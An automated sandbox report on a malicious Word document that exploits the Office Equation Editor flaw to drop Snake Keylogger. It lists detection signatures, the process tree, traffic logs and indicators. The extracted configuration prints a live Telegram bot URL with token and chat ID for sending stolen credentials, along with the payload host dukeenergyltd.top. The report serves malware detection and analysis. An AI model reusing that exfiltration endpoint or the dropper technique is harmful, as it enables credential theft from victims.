Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc

Overview

General Information

Sample name:ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc
Analysis ID:1430108
MD5:d90ae35b86323a7495fbd0f89b74ad08
SHA1:a913d6148cbfb3a5be68a34052a4d1ab7d9de989
SHA256:88ad296056a6be66969f1e5ce6694398944804a39d8465b42e0af73c5af12cb0
Tags:doc
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: SCR File Write Event
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Screensaver Binary File Creation
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2352 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2160 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • mpoom39002.scr (PID: 3216 cmdline: "C:\Users\user\AppData\Roaming\mpoom39002.scr" MD5: 37383DB5D0AAF3A258780342654AE739)
        • mpoom39002.scr (PID: 3248 cmdline: "C:\Users\user\AppData\Roaming\mpoom39002.scr" MD5: 37383DB5D0AAF3A258780342654AE739)
    • EQNEDT32.EXE (PID: 3444 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot5611396317:AAGsgxx4hwlHZa8kVodTZpCQipWRFwFvBO0/sendMessage?chat_id=5237953097"}
SourceRuleDescriptionAuthorStrings
ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x7890:$obj2: \objdata
  • 0x78a8:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
00000005.00000002.346422484.00000000005F0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
  • 0x4a06b:$x1: In$J$ct0r
00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x13cf8:$a1: get_encryptedPassword
        • 0x13fe4:$a2: get_encryptedUsername
        • 0x13b04:$a3: get_timePasswordChanged
        • 0x13bff:$a4: get_passwordField
        • 0x13d0e:$a5: set_encryptedPassword
        • 0x1532e:$a7: get_logins
        • 0x15291:$a10: KeyLoggerEventArgs
        • 0x14efb:$a11: KeyLoggerEventArgsEventHandler
        Click to see the 18 entries
        SourceRuleDescriptionAuthorStrings
        5.2.mpoom39002.scr.5f0000.2.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
        • 0x4a06b:$x1: In$J$ct0r
        5.2.mpoom39002.scr.3253190.5.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
        • 0x4826b:$x1: In$J$ct0r
        5.2.mpoom39002.scr.3253190.5.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
        • 0x4a06b:$x1: In$J$ct0r
        5.2.mpoom39002.scr.5f0000.2.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
        • 0x4826b:$x1: In$J$ct0r
        6.2.mpoom39002.scr.80000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 39 entries

          System Summary

          barindex
          Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 172.67.134.136, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2160, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\mpoom39002.scr", CommandLine: "C:\Users\user\AppData\Roaming\mpoom39002.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\mpoom39002.scr, NewProcessName: C:\Users\user\AppData\Roaming\mpoom39002.scr, OriginalFileName: C:\Users\user\AppData\Roaming\mpoom39002.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2160, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\mpoom39002.scr", ProcessId: 3216, ProcessName: mpoom39002.scr
          Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2160, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scr
          Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\mpoom39002.scr, QueryName: checkip.dyndns.org
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2160, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scr
          Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2160, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2352, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot5611396317:AAGsgxx4hwlHZa8kVodTZpCQipWRFwFvBO0/sendMessage?chat_id=5237953097"}
          Source: dukeenergyltd.topVirustotal: Detection: 25%Perma Link
          Source: https://dukeenergyltd.top/Virustotal: Detection: 24%Perma Link
          Source: ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docReversingLabs: Detection: 42%
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scrJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrJoe Sandbox ML: detected

          Exploits

          barindex
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 172.67.134.136 Port: 443Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\mpoom39002.scr
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\mpoom39002.scrJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 172.67.134.136:443 -> 192.168.2.22:49161 version: TLS 1.2
          Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: mpoom39002.scr, 00000005.00000002.346550493.0000000002201000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000005.00000002.346411326.0000000000330000.00000004.08000000.00040000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001F6437h6_2_001F608D
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001FF3E1h6_2_001FF128
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001FFC91h6_2_001FF9D8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001F5481h6_2_001F51C1
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001F6CF7h6_2_001F6A38
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001F75B7h6_2_001F72F8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_001F3B30
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001FF839h6_2_001FF580
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001F6897h6_2_001F65D9
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001F5A43h6_2_001F5630
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001F7157h6_2_001F6E99
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001F5A43h6_2_001F5972
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_001F4162
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_001F4342
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001F5A43h6_2_001F5620
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 001F50FCh6_2_001F47FD
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F84D1h6_2_003F8228
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F4CC1h6_2_003F4A18
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F32B1h6_2_003F3008
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F9AB1h6_2_003F9808
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F3709h6_2_003F3460
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F9F09h6_2_003F9C60
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F1CF9h6_2_003F1A50
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F02E9h6_2_003F0040
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003FB4E9h6_2_003FB240
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F3B61h6_2_003F38B8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F2151h6_2_003F1EA8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F8951h6_2_003F86A8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F0741h6_2_003F0498
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003FB941h6_2_003FB698
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F0B99h6_2_003F08F0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003FBD99h6_2_003FBAF0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003FA38Ah6_2_003FA0E0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003FA7E1h6_2_003FA538
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F3FB9h6_2_003F3D10
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F25A9h6_2_003F2300
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F8DA9h6_2_003F8B00
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F4411h6_2_003F4168
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F2A01h6_2_003F2758
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F9201h6_2_003F8F58
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F0FF1h6_2_003F0D48
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003FC1F1h6_2_003FBF48
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F2E59h6_2_003F2BB0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F9659h6_2_003F93B0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F1449h6_2_003F11A0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003FAC39h6_2_003FA990
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F18A1h6_2_003F15F8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003FB091h6_2_003FADE8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then jmp 003F4869h6_2_003F45C0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_003F6458
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_003F644A
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_003F676E
          Source: global trafficDNS query: name: dukeenergyltd.top
          Source: global trafficDNS query: name: checkip.dyndns.org
          Source: global trafficDNS query: name: checkip.dyndns.org
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
          Source: global trafficTCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
